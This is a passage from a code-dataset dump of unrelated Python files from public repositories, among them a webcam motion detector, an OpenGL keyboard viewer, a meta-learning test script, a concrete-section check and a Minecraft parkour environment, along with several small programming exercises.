307097451\n Shvartsman Yevgniy 310360961\n\nDate:14-Apr-15\n'''\nimport numpy as np\nimport cv2\nfrom scipy import signal\nimport threading\n\ncondition=threading.Condition()\nframes=[]\nresult=None\nframe=None\n\ndef captureVideo():\n '''\n this function captures the video from camera in a given interval\n '''\n global frames,frame\n \n frames=[]\n cap = cv2.VideoCapture(0)\n #creating an event that will wakeup every 0.25 seconds\n stopped=threading.Event()\n\n while(not stopped.wait(0.25)):\n # Capture frame-by-frame\n ret,frame = cap.read()\n #sometimes first frame is null due to camera warmup\n if not ret:\n continue \n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n \n frames.append(gray)\n with condition:# condition variable notify on append of frame\n condition.notifyAll()\n \n # When everything done, release the capture \n cap.release()\n cv2.destroyAllWindows()\n \n \n\ndef makeGaussKernel(size_x,size_y):\n '''\n This function creates gaussian kernel \n '''\n kernel=np.zeros((size_x,size_y))\n \n for x in range(0,size_x):\n for y in range(0,size_y):\n kernel[x][y]=np.exp(-(x**2/float(size_x)+(y**2)/float(size_y)))\n \n return kernel\n\nkernel=makeGaussKernel(3,3)\n\ndef convolution2D(frames,kernel):\n '''\n creating a list of convoluted frames \n '''\n convolved=[]\n for frame in frames:\n convolved.append(signal.convolve2d(frame,kernel,mode='same')) \n return convolved\n\ndef weightedMean(frames):\n '''\n calculating the average frame\n '''\n height,width=frames[0].shape\n final=np.zeros((height,width))\n\n weight_sum=0\n for i in range(0,len(frames)):\n weight_sum+=(i+1)\n frames[i]*=(i+1)\n frame=frames[i]/1.0\n final=cv2.add(final,frame)\n\n return (final/float(weight_sum))\n\n\ndef linear_Normalization(lst, i):\n '''\n linear noramlization of the frame (I-Min)*(new_Max-new_Min)/(Max-Min) +New_min\n '''\n newMax=255.0\n Min = lst[i].min()\n Max = lst[i].max()\n lst[i] -= Min\n try:\n \n lst[i] *= newMax / (Max - Min)\n \n except ZeroDivisionError:\n print('')\n \n #return np.uint8(lst)\n\ndef normalize(frames):\n '''\n looping over the frames and applying the linear_normalization\n '''\n new_lst=[]\n \n for i in range(0,len(frames)):\n new_lst.append(np.array(frames[i]))\n linear_Normalization(new_lst, i)\n return new_lst\n\n\ndef trackMovement():\n '''\n tracking movement EX 1 \n '''\n lst=[]\n global frames,result\n while True:\n with condition:\n condition.wait()\n \n convolved=convolution2D(frames,kernel)\n normalized_convolved=normalize(convolved)\n weighthed=weightedMean(normalized_convolved)\n linear_Normalization(weighthed, 0)\n result=np.uint8(weighthed)-np.asarray(normalized_convolved[-1]) ##convolved ch \n \n lst.append(result) \n cv2.imshow('Black_And_White',result)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ndef draw_Contours():\n '''\n Drawing contours on the frame,based on tracked_movement\n '''\n global result,frame\n while(True):\n #waiting to be notifed for frame insertion\n with condition:\n condition.wait()\n \n res=np.array(result,dtype='float32')\n \n _,thresh = cv2.threshold(res,5,255,cv2.THRESH_BINARY)\n \n contours,_ = cv2.findContours(np.uint8(thresh),cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n cv2.drawContours(frame, contours, -1, (255,255,255), 3)\n \n cv2.imshow('color',frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \ndef clear_Frames():\n global frames\n frames=[]\n threading.Timer(1, clear_Frames).start()\n \ntry:\n threading.Thread(target=captureVideo).start()\n threading.Thread(target=trackMovement,).start()\n threading.Thread(target=clear_Frames,).start()\n threading.Thread(target=draw_Contours,).start()\nexcept:\n print (\"Error: unable to start thread\")\n\n\n ","repo_name":"MaxToyberman/Motion-Detection","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33565379598","text":"# TASK\n# An extra day is added to the calendar almost every four years as February 29, and the day is called a leap day. It corrects the calendar for the fact that our planet takes approximately 365.25 days to orbit the sun. A leap year contains a leap day.\n#\n# In the Gregorian calendar, three conditions are used to identify leap years:\n#\n# The year can be evenly divided by 4, is a leap year, unless:\n# The year can be evenly divided by 100, it is NOT a leap year, unless:\n# The year is also evenly divisible by 400. Then it is a leap year.\n# This means that in the Gregorian calendar, the years 2000 and 2400 are leap years, while 1800, 1900, 2100, 2200, 2300 and 2500 are NOT leap years. Source\n#\n# Artık Yıl Nasıl Hesaplanır\n# Gregoryen takviminin kurallarına göre bir yılın artık yıl olup olmadığı şöyle belirlenir:\n# 400'ün katı olan yıllar artık yıllardır.\n#\n# Bunun dışında 4'ün katı olan yıllar içerisinde yalnız 100'ün katı olmayan yıllar artık yıllardır.\n# Task\n#\n# Given a year, determine whether it is a leap year. If it is a leap year, return the Boolean True, otherwise return False.\n\ndef is_leap(year):\n leap = False\n if year >= 1900 and year <= pow(10, 5):\n if year % 400 == 0:\n leap = True\n\n elif year % 4 == 0 and year % 100 != 0:\n leap = True\n\n else:\n leap = False\n\n return leap\n\n\nyear = int(input())\nprint(is_leap(year))","repo_name":"eyllcyldrm/Hackerrank-pratikleri","sub_path":"code4.py","file_name":"code4.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39600249171","text":"from keyboard import *\nfrom OpenGL.GLUT import *\nfrom time import *\nfrom math import *\n\n# global storage of various params\nhWindow = 0\nbFill = 0\nbRotation = 1\nRotX = 0\nRotY = 0\nRotZ = 0\nCamPhi = 60\nCamTheta = 0\nCamRange = 15\n\ndef InitGL(width, height):\n \"\"\"\n Initialises the GL scene by enabling various features\n \"\"\"\n glClearColor(0.37, 0.37, 0.44, 1)\n glClearDepth(1.0)\n glDepthFunc(GL_LESS)\n glEnable(GL_DEPTH_TEST)\n glShadeModel(GL_SMOOTH)\n glEnable(GL_COLOR_MATERIAL)\n\n ResizeGLScene(width, height)\n\ndef ResizeGLScene(width, height):\n \"\"\"\n Function for making appropriate adjustments for window resizing\n \"\"\"\n\n # prevent a divide-by-zero error if the window is too small\n if height == 0:\n height = 1\n\n # reset the current viewport and recalculate the perspective transformation\n # for the projection matrix\n glViewport(0, 0, width, height)\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n gluPerspective(45.0, float(width)/float(height), 0.1, 100.0)\n\n glMatrixMode(GL_MODELVIEW)\n\ndef DrawGLScene():\n \"\"\"\n Draws the scene\n \"\"\"\n global Theta\n global CamPhi, CamTheta, CamRange\n global LightPhi, LightTheta, LightRange\n\n # clear the screen and depth buffer\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n # reset the matrix stack with the identity matrix\n glLoadIdentity()\n\n # CAMERA\n r_xz = CamRange*cos(CamPhi*pi/180)\n x = r_xz*sin(CamTheta*pi/180)\n y = CamRange*sin(CamPhi*pi/180)\n z = r_xz*cos(CamTheta*pi/180)\n\n gluLookAt(x, y, z,\n 0, 0, 0,\n\t 0, 1, 0\n )\n\n # LIGHTING\n\n yellow_tinge = GLfloat_3(1, 0.97, 0.91)\n white = GLfloat_3(1, 1, 1)\n\n glLightfv(GL_LIGHT0, GL_AMBIENT, GLfloat_3(.25, .25, .25))\n glLightfv(GL_LIGHT0, GL_POSITION, GLfloat_3(0, 10, 0))\n\n glLightfv(GL_LIGHT1, GL_DIFFUSE, yellow_tinge)\n glLightfv(GL_LIGHT1, GL_SPECULAR, white)\n glLightfv(GL_LIGHT1, GL_POSITION, GLfloat_4(-13, 5, 3, 3))\n\n glLightfv(GL_LIGHT2, GL_DIFFUSE, yellow_tinge)\n glLightfv(GL_LIGHT2, GL_SPECULAR, white)\n glLightfv(GL_LIGHT2, GL_POSITION, GLfloat_4(13, 5, 3, 3))\n\n glMaterialfv(GL_FRONT_AND_BACK, GL_SPECULAR, [1, 1, 1, 1])\n glEnable(GL_LIGHT0)\n glEnable(GL_LIGHT1)\n glEnable(GL_LIGHT2)\n\n glEnable(GL_LIGHTING)\n\n # Draw the keyboard\n draw_keyboard()\n\n glutSwapBuffers()\n\n sleep(0.01)\n\n\ndef KeyPressed(key, x, y):\n \"\"\"\n Process a keypress\n \"\"\"\n global bFill, CamPhi, CamTheta, CamRange, bRotation\n\n key = ord(key)\n\n if key == 27:\n glutDestroyWindow(hWindow)\n sys.exit()\n elif key == ord('S') or key == ord('s'):\n CamPhi -= 1\n if CamPhi < -90:\n CamPhi = -90\n elif key == ord('W') or key == ord('w'):\n CamPhi += 1\n if CamPhi > 90:\n CamPhi = 90\n elif key == ord('A') or key == ord('a'):\n CamTheta -= 1\n if CamTheta < 0:\n CamTheta += 360\n elif key == ord('D') or key == ord('d'):\n CamTheta += 1\n if CamTheta > 360:\n CamTheta -= 360\n elif key == ord('E') or key == ord('e'):\n CamRange -= 1\n elif key == ord('Q') or key == ord('q'):\n CamRange += 1\n elif key == ord('F') or key == ord('f'):\n if bFill == 0:\n glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)\n bFill = 1\n else:\n glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)\n bFill = 0\n elif key == ord('R') or key == ord('r'):\n if bRotation == 0:\n bRotation = 1\n else:\n bRotation = 0\n else:\n return\n\ndef main():\n \"\"\"\n Runs the application\n \"\"\"\n global hWindow\n\n # initialise GLUT\n glutInit(\"\")\n glutInitDisplayMode(GLUT_RGBA | GLUT_DEPTH | GLUT_DOUBLE | GLUT_MULTISAMPLE)\n glutInitWindowSize(760, 480)\n glutInitWindowPosition(0, 0)\n\n hWindow = glutCreateWindow(b\"COSC3000: Tom Quirk\")\n\n # setup the display function callback\n glutDisplayFunc(DrawGLScene)\n\n glutIdleFunc(DrawGLScene)\n glutReshapeFunc(ResizeGLScene)\n glutKeyboardFunc(KeyPressed)\n\n # call our init function\n InitGL(1920, 1080)\n\n # enter the window's main loop to set things rolling\n glutMainLoop()\n\n\n# Tell people how to exit, then start the program...\nprint(\"Program Controls\\n\\n\\\n Esc - Exit the program\\n\\\n A-D - Camera: Rotate around object (theta)\\n\\\n W-S - Camera: Rotate around object (phi)\\n\\\n Q-E - Camera: Zoom\\n\\\n F - Toggle Shadding/Wire-frame\\n\\\n R - Toggle Rotation on/off\\n\\\n \")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tomquirk/open-cg-keyboard","sub_path":"init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"34556020352","text":"import os\nimport argparse\nimport numpy as np\nimport tensorflow as tf\n\nfrom maml import STDN, AttentionSTDN\nfrom maml_data_generator import DataGenerator\nfrom sklearn.metrics import mean_squared_error\n\n\ndef test(model, data_generator, sess, saver):\n train_inputs, train_labels = data_generator.get_all_data(purpose='train')\n train_inputs, train_labels = train_inputs[0], train_labels[0]\n\n test_inputs, test_labels = data_generator.get_all_data(purpose='test')\n test_inputs, test_labels = test_inputs[0], test_labels[0]\n\n train_batch_num = int(train_inputs.shape[1] / update_batch_size)\n test_batch_num = int(test_inputs.shape[1] / update_batch_size)\n\n if len(output_dir) > 0:\n data_generator.save_test_ground_truth(output_dir=output_dir,\n test_data_num=test_batch_num * update_batch_size)\n for epoch in range(epochs):\n total_test_loss = []\n total_outputa = []\n\n for i in range(test_batch_num):\n inputa = test_inputs[:, i * update_batch_size: (i+1) * update_batch_size, :, :]\n labela = test_labels[:, i * update_batch_size: (i+1) * update_batch_size, :]\n if \"att\" in model_type:\n dummy_clusters = np.zeros(shape=(len(inputa), update_batch_size, 1))\n feed_dict = {model.inputa: inputa, model.labela: labela, model.clustera: dummy_clusters}\n else:\n feed_dict = {model.inputa: inputa, model.labela: labela}\n outputa, loss1, = sess.run([model.outputas, model.total_loss1], feed_dict)\n total_outputa.append(outputa)\n total_test_loss.append(loss1)\n total_outputa = np.concatenate(total_outputa, axis=1)\n\n if len(output_dir) > 0:\n np.savez(output_dir + \"/output_\" + model_type, total_outputa)\n saver.save(sess, output_dir + \"/model_\" + model_type)\n print(epoch, np.sqrt(np.mean(total_test_loss)))\n\n total_train_loss = []\n total_train_outputa = []\n\n for i in range(train_batch_num):\n inputa = train_inputs[:, i * update_batch_size: (i + 1) * update_batch_size, :, :]\n labela = train_labels[:, i * update_batch_size: (i + 1) * update_batch_size, :]\n if \"att\" in model_type:\n dummy_clusters = np.zeros(shape=(len(inputa), update_batch_size, 1))\n feed_dict = {model.inputa: inputa, model.labela: labela, model.clustera: dummy_clusters}\n else:\n feed_dict = {model.inputa: inputa, model.labela: labela}\n sess.run([model.finetune_op], feed_dict)\n outputa, loss1 = sess.run([model.outputas, model.total_loss1], feed_dict)\n total_train_outputa.append(outputa)\n total_train_loss.append(loss1)\n\n if len(output_dir) > 0:\n np.savez(output_dir + \"/output_train_\" + model_type, total_train_outputa)\n print(\"train:\", epoch, np.sqrt(np.mean(total_train_loss)))\n\ndef main():\n tf.set_random_seed(1234)\n\n print(model_type, \"att\" in model_type, \"meta\" in model_type)\n if \"att\" in model_type:\n model = AttentionSTDN(dim_input=dim_input, dim_output=dim_output, seq_length=seq_length,\n filter_num=64, dim_cnn_flatten=7*7*64,\n dim_fc=512, dim_lstm_hidden=128,\n update_lr=update_lr, meta_lr=meta_lr,\n meta_batch_size=1,\n update_batch_size=update_batch_size,\n test_num_updates=1,\n cluster_num=4, memory_dim=mem_dim,\n cluster_loss_weight=0)\n else:\n model = STDN(dim_input=dim_input, dim_output=dim_output, seq_length=seq_length,\n filter_num=64, dim_cnn_flatten=7*7*64,\n dim_fc=512, dim_lstm_hidden=128,\n update_lr=update_lr, meta_lr=meta_lr,\n meta_batch_size=1,\n update_batch_size=update_batch_size,\n test_num_updates=1)\n model.construct_model()\n\n sess = tf.InteractiveSession()\n saver = tf.train.Saver(tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES), max_to_keep=10)\n\n tf.global_variables_initializer().run()\n tf.train.start_queue_runners()\n\n data_generator = DataGenerator(dim_input=dim_input,\n dim_output=dim_output,\n seq_length=seq_length,\n threshold=threshold)\n if dim_output == 2:\n data_generator.load_train_data(cities=[city], train_prop=int(test_days*24), select_data='all', shuffle=False)\n else:\n data_generator.load_train_data(cities=[city], train_prop=int(test_days*24), select_data='pick', shuffle=False)\n\n if len(save_dir) > 0:\n model_file = save_dir + \"/\" + model_type + \"/\" + test_model_name\n saver.restore(sess, model_file)\n\n print(\"Testing:\", model_file, \"with %d days data\" % test_days)\n else:\n print(\"Target data only\", \"with %d days data\" % test_days)\n test(model, data_generator, sess, saver)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--city', type=str, default='nyc,dc')\n parser.add_argument('--save_dir', type=str, default='')\n parser.add_argument('--model_type', type=str, default='')\n\n parser.add_argument('--test_model', type=str)\n parser.add_argument('--test_days', type=int)\n parser.add_argument('--output_dir', type=str, default='')\n\n parser.add_argument('--update_batch_size', type=int, default=128)\n parser.add_argument('--threshold', type=float, default=0)\n parser.add_argument('--meta_lr', type=float, default=1e-5)\n parser.add_argument('--update_lr', type=float, default=1e-5)\n\n parser.add_argument('--mem_dim', type=int, default=8)\n\n parser.add_argument('--epochs', type=int, default=20)\n parser.add_argument('--gpu_id', type=str, default=\"4\")\n\n dim_output = 2\n dim_input = 7*7*dim_output\n seq_length = 8\n\n args = parser.parse_args()\n\n city = args.city\n save_dir = args.save_dir\n model_type = args.model_type\n\n mem_dim = args.mem_dim\n\n test_model_name = args.test_model\n test_days = args.test_days\n output_dir = args.output_dir\n\n update_batch_size = args.update_batch_size\n threshold = args.threshold\n meta_lr = args.meta_lr\n update_lr = args.update_lr\n\n epochs = args.epochs\n\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpu_id\n\n main()\n","repo_name":"huaxiuyao/MetaST","sub_path":"maml/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":6575,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"31"} +{"seq_id":"11281793423","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport math\nimport pandas as pd\nfrom scipy.stats import ttest_1samp, ttest_ind, kendalltau\nfrom scipy import stats\nfrom sklearn import metrics\nfrom sklearn.manifold import TSNE\nimport sys\nimport os\n\nconsistency_eval_path = '/home/schaferd/ae_project/Modular_DSCA_TF_Prediction/'\nsys.path.insert(1,consistency_eval_path)\nfrom check_consistency_ko import calculate_consistency, make_random_ranks\n\nbase_path = \"/nobackup/users/schaferd/ae_project_outputs/model_eval//\"\n\ntf_fc = base_path+\"/__tffc-fc_epochs100_batchsize128_enlr0.001_delr0.0001_moa1.0_rel_conn10_2-10_16.14.43/\"\ntf_shallow = base_path+\"/__tffc-shallow_epochs100_batchsize128_enlr0.001_delr0.01_moa1.0_rel_conn10_2-11_15.50.53/\"\ntf_gene = base_path+\"/__tffc-genefc_epochs100_batchsize128_enlr0.001_delr0.01_moa1.0_rel_conn10_2-10_21.56.47/\"\n\nshallow_fc =base_path+\"/__shallow-fc_epochs100_batchsize128_enlr0.001_delr0.0001_moa1.0_rel_conn10_2-11_15.50.58/\"\nshallow_shallow = base_path+\"/__shallow-shallow_epochs100_batchsize128_enlr0.01_delr0.01_moa1.0_rel_conn10_2-11_15.51.40/\"\nshallow_gene = base_path+\"/__shallow-genefc_epochs100_batchsize128_enlr0.01_delr0.01_moa1.0_rel_conn10_2-11_15.51.25/\"\n\nfc_fc= base_path+\"/__fc-fc_epochs100_batchsize128_enlr0.0001_delr0.0001_moa1.0_rel_conn10_2-10_16.11.55/\"\nfc_shallow =base_path+\"/__fc-shallow_epochs100_batchsize128_enlr0.0001_delr0.001_moa1.0_rel_conn10_2-10_16.14.5/\"\nfc_gene = base_path+\"/__fc-genefc_epochs100_batchsize128_enlr0.0001_delr0.01_moa1.0_rel_conn10_2-10_16.13.22/\"\n\ncols = ['fc_fc', 'fc_g','fc_s','s_fc','s_g','s_s','t_g','t_fc','t_s']\n\nnum_trials = calculate_consistency(fc_fc)[0].shape[0]\nprint( calculate_consistency(fc_fc)[0].shape)\n\nsample_ids = []\nfor col in cols:\n for i in range(num_trials):\n sample_ids.append(col)\nprint(sample_ids)\n\n\ndata = np.array([*calculate_consistency(fc_fc)[0],*calculate_consistency(fc_gene)[0],*calculate_consistency(fc_shallow)[0],*calculate_consistency(shallow_fc)[0],*calculate_consistency(shallow_gene)[0],*calculate_consistency(shallow_shallow)[0],*calculate_consistency(tf_gene)[0],*calculate_consistency(tf_fc)[0],*calculate_consistency(tf_shallow)[0]])\n\ndistance_matrix = None\nkendall_matrix = None\n\ndef get_dists(data,sample):\n dists = []\n for row in data:\n dists.append(np.sqrt(np.sum(np.square(row-sample))))\n return dists\n\ndef get_kends(data,sample):\n kends = []\n for row in data:\n kends.append(1-(2/(1+kendalltau(row,sample)[0]+0.0001)))\n return kends \n\nfor sample in data:\n dist = get_dists(data, sample)\n kend = get_kends(data, sample)\n if distance_matrix is None:\n distance_matrix = dist\n kendall_matrix = kend\n else:\n distance_matrix = np.vstack((distance_matrix,dist))\n kendall_matrix = np.vstack((kendall_matrix,kend))\n\nprint(distance_matrix)\nprint(kendall_matrix)\n\n\n#print(data)\n#print(data.shape)\n\n\nkend_embedding = pd.DataFrame(TSNE(n_components=2,learning_rate='auto',init='random',perplexity=5).fit_transform(kendall_matrix),columns=['tsne1','tsne2'])\ndist_embedding = pd.DataFrame(TSNE(n_components=2,learning_rate='auto',init='random',perplexity=5).fit_transform(distance_matrix),columns=['tsne1','tsne2'])\nkend_embedding['id']=sample_ids\ndist_embedding['id']=sample_ids\n\n#print(embedding)\n#print(kend_embedding)\n\nsns.scatterplot(\n x='tsne1',y='tsne2',\n hue='id',\n data=dist_embedding,\n legend='full',\n )\nplt.title('Consistency T-SNE')\nplt.savefig('dist_tsneeze.png')\n\n\nplt.clf()\nsns.scatterplot(x='tsne1',y='tsne2',hue='id', data=kend_embedding, legend='full',)\n\nplt.savefig('kend_tsneeze.png')\n","repo_name":"schaferd/Modular_DSCA_TF_Prediction","sub_path":"figs/model_figs/t_sneeze.py","file_name":"t_sneeze.py","file_ext":"py","file_size_in_byte":3689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25825079275","text":"# -*- coding: utf-8 -*-\n''' Momento tope.'''\n\n__author__= \"Luis C. Pérez Tato (LCPT) and Ana Ortega (AO_O)\"\n__copyright__= \"Copyright 2023, LCPT and AO_O\"\n__license__= \"GPL\"\n__version__= \"3.0\"\n__email__= \"l.pereztato@ciccp.es ana.ortega@ciccp.es\"\n\nimport math\nfrom materials.ec2 import EC2_materials\nfrom materials.ec2 import EC2_limit_state_checking\nfrom rough_calculations import ng_rc_section\n\n# Bending with axial force.\n\n# Example 15.8 from the book.\n## Materials.\nconcrete= EC2_materials.C25\nsteel= EC2_materials.S500B\nA10_15= EC2_limit_state_checking.EC2RebarFamily(steel= steel, diam= 10e-3, spacing= 0.15, concreteCover= 0.025)\n\n## Section geometry.\nb= 0.3\ndp= 0.03\nh= 0.5\nrcSection= ng_rc_section.RCSection(tensionRebars= A10_15, concrete= concrete, b= b, h= h)\n\n## Internal forces\nMd= 300e3\nNd= -250e3\n\nAp= rcSection.getCompressionReinforcementArea(dp= dp, Nd= Nd, Md= Md)\nA= rcSection.getTensionReinforcementArea(Ap= Ap, dp= dp, Nd= Nd, Md= Md)\nUp= Ap*steel.fyd()\nU= A*steel.fyd()\n\nerror= math.sqrt((Ap)**2+(A-15.997484618067281e-4)**2)\n\n'''\nprint('fcd= ', -concrete.fcd()/1e6, 'MPa')\nprint('d= ', rcSection.d())\nprint('dp= ', dp)\nprint('Ap= ',Ap*1e4, 'cm2')\nprint('Up= ',Up/1e3, 'kN')\nprint('A= ',A*1e4, 'cm2')\nprint('U= ',U/1e3, 'kN')\nprint('error= ', error)\n'''\n\nimport os\nfrom misc_utils import log_messages as lmsg\nfname= os.path.basename(__file__)\nif (error<1e-6):\n print('test '+fname+': ok.')\nelse:\n lmsg.error(fname+' ERROR.')\n","repo_name":"xcfem/xc","sub_path":"verif/tests/rough_calculations/reinforced_concrete/ng_rc_section_bending_with_compression_test_01.py","file_name":"ng_rc_section_bending_with_compression_test_01.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":196,"dataset":"github-code","pt":"31"} +{"seq_id":"512402633","text":"# OOPS Program to Replace the Paragraph Content with Proper Name,Fullname and Mobile No.\n\nimport re\nimport datetime\n\n# Assigning a Paragraph to the String\n\nstring = \"Hello <>, We have your full name as <> in our system. \" \\\n \"your contact number is 91-xxxxxxxxxx. \" \\\n \"Please,let us know in case of any clarification Thank you BridgeLabz 01/01/2016\"\n\n# Accept Name,Fullname and Mobile no from user\ncount = 1\nwhile count > 0:\n try:\n Name = input(\"Enter the Name:\")\n FullName = input(\"Enter the FullName:\")\n MobileNo = input(\"Enter the Mobile Number:\")\n if not Name.isalpha() or not FullName.isalpha() or not MobileNo.isnumeric():\n raise ValueError\n except:\n print(\"You have entered wrong data.\")\n print(\"Please Enter the Values Again\")\n else:\n break\n # Accepting date using inbuild Function\n\ndate = datetime.datetime.now()\ndateformat = date.strftime(\"%d/%m/%y\")\nstring = re.sub(\"<>\", Name, string) # Replacing the string <> with proper Name\nstring = re.sub(\"<>\", FullName, string) # Replacing the string <> with FullName\nstring = re.sub(\"xxxxxxxxxx\", MobileNo, string) # Replacing the string <> with Mobile No\nstring = re.sub(\"01/01/2016\", dateformat, string) # Replacing the string 01/01/2016 with Today's Date\n# Display the Replace String\n\nprint(string)\n\n\n","repo_name":"Ibbukanch/Python-programs","sub_path":"pythonprograms/OOPS/Reexpdemo.py","file_name":"Reexpdemo.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19340169849","text":"\"\"\"\nGiven a non-negative integer x, return the square root of x rounded down to the nearest integer. The returned integer should be non-negative as well.\n\nYou must not use any built-in exponent function or operator.\n\"\"\"\n\n\"\"\"Intuition\"\"\"\n# def solutions(x:int) -> int:\n# for i in range(x//2):\n# if i*i <= x and (i+1)*(i+1) > x:\n# return i\n# return -1\n\"\"\"\nBinary search\n\"\"\"\ndef solutions(x:int) -> int:\n if x == 0 or x == 1:\n return x\n low = 0\n high = x\n while (low <= high):\n mid = (low + high) // 2\n if (x // mid == mid):\n return mid\n if(x // mid < mid):\n high = mid - 1\n else:\n low = mid + 1\n return high\nprint(solutions(8))","repo_name":"link5401/myl-leet-code","sub_path":"python/my-sqrt/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5577306795","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def sufficientSubset(self, root: Optional[TreeNode], limit: int) -> Optional[TreeNode]:\n return root if self.rec_dfs(root, limit) else None\n \n \n \n def rec_dfs(self, node, limit, curr_sum=0):\n curr_sum += node.val\n \n if not node.left and not node.right:\n return curr_sum >= limit \n \n left = self.rec_dfs(node.left, limit, curr_sum) if node.left else False\n\n right = self.rec_dfs(node.right, limit, curr_sum) if node.right else False\n \n if not left:\n node.left = None\n if not right:\n node.right = None\n \n return left or right\n ","repo_name":"elvinmirzazada/leetcode-challanges","sub_path":"1080-insufficient-nodes-in-root-to-leaf-paths/1080-insufficient-nodes-in-root-to-leaf-paths.py","file_name":"1080-insufficient-nodes-in-root-to-leaf-paths.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"5668729050","text":"\"\"\"\nCreated on Feb 09, 2023\n\n@author: LouisCaubet\n\"\"\"\nfrom typing import List\nimport csv\nimport os\n\nfrom minerl.herobraine.env_specs.basalt_specs import BasaltBaseEnvSpec, MINUTE\nfrom minerl.herobraine.env_specs.simple_embodiment import SimpleEmbodimentEnvSpec\nfrom minerl.herobraine.hero.handler import Handler\nimport minerl.herobraine.hero.handlers as handlers\nfrom minerl.herobraine.hero.handlers import TranslationHandler\nfrom minerl.herobraine.hero.mc import MS_PER_STEP\n\nfrom block_list_handler import BlockListHandler\n\nNAVIGATE_STEPS = 6000\n\n\nclass MinecraftParkourEnv(BasaltBaseEnvSpec):\n\n def __init__(self):\n super().__init__(\n name=\"MinecraftParkour-v0\",\n demo_server_experiment_name=\"minecraft_parkour\",\n max_episode_steps=12 * MINUTE,\n preferred_spawn_biome=\"ocean\",\n inventory=[],\n )\n self.blocks = []\n self.start_block = None\n\n def load_map(self, map_csv: str):\n # Do this only once\n if hasattr(self, 'blocks') and len(self.blocks) > 0:\n return\n\n # read csv and create list of blocks\n print(\"Called load map\")\n self.blocks = []\n with open(map_csv, newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n # skip first line\n next(reader)\n for row in reader:\n x = int(row[0])\n y = int(row[1])\n z = int(row[2])\n block_type = row[3]\n self.blocks.append([x, y, z, block_type])\n\n self.start_block = self.blocks[0]\n\n def create_rewardables(self) -> List[handlers.TranslationHandler]:\n rewards = [\n {'type': 'bedrock', 'behaviour': 'onceOnly', 'reward': '-100'},\n {'type': 'diamond_block', 'behaviour': 'onceOnly', 'reward': '100'},\n {'type': 'gold_block', 'behaviour': 'oncePerBlock', 'reward': '10'},\n ]\n\n return [\n handlers.RewardForTouchingBlockType(rewards)\n ]\n\n def create_agent_start(self) -> List[Handler]:\n return [\n handlers.AgentStartPlacement(0.5, 2, 0.5, yaw=-90)\n ]\n\n def create_agent_handlers(self) -> List[Handler]:\n return [\n handlers.AgentQuitFromTouchingBlockType(\n [\"bedrock\", \"diamond_block\"]\n )\n ]\n\n def create_server_initial_conditions(self) -> List[Handler]:\n return [\n handlers.TimeInitialCondition(\n allow_passage_of_time=False,\n start_time=6000\n ),\n handlers.WeatherInitialCondition('clear'),\n handlers.SpawningInitialCondition(False),\n ]\n\n def create_server_decorators(self) -> List[Handler]:\n # Create XML string to draw blocks\n map_csv_path = os.environ['MINERL_PARKOUR_MAP']\n self.load_map(map_csv_path)\n\n return [\n BlockListHandler(self.blocks)\n ]\n\n def create_server_world_generators(self) -> List[Handler]:\n path_to_world = os.path.abspath(os.path.join(\"assets\", \"empty_mc_world\"))\n return [\n handlers.FlatWorldGenerator(generatorString=\"3;7;0;\", force_reset=False),\n ]\n\n # def create_server_quit_producers(self) -> List[Handler]:\n # return [\n # handlers.ServerQuitFromTimeUp(NAVIGATE_STEPS * MS_PER_STEP),\n # handlers.ServerQuitWhenAnyAgentFinishes()\n # ]\n","repo_name":"LouisCaubet/RLMinecraftParkour","sub_path":"src/parkour_env.py","file_name":"parkour_env.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"35844877532","text":"prompt = \"\\nPlease enter a topping you want on your pizza:\"\nprompt += \"\\n(Enter 'quit' when you are finished.) \"\n\nactive = True\n\nwhile active:\n pizza_topping = input(prompt)\n\n if pizza_topping == 'quit':\n active = False\n else:\n print(f\"We'll add {pizza_topping} to your pizza.\")","repo_name":"maxrebo2/Python-Work","sub_path":"three_exits1.py","file_name":"three_exits1.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13655957836","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nwhile True:\r\n data = list(map(int, input().rstrip().split()))\r\n if data == [0, 0, 0]:\r\n break\r\n else:\r\n 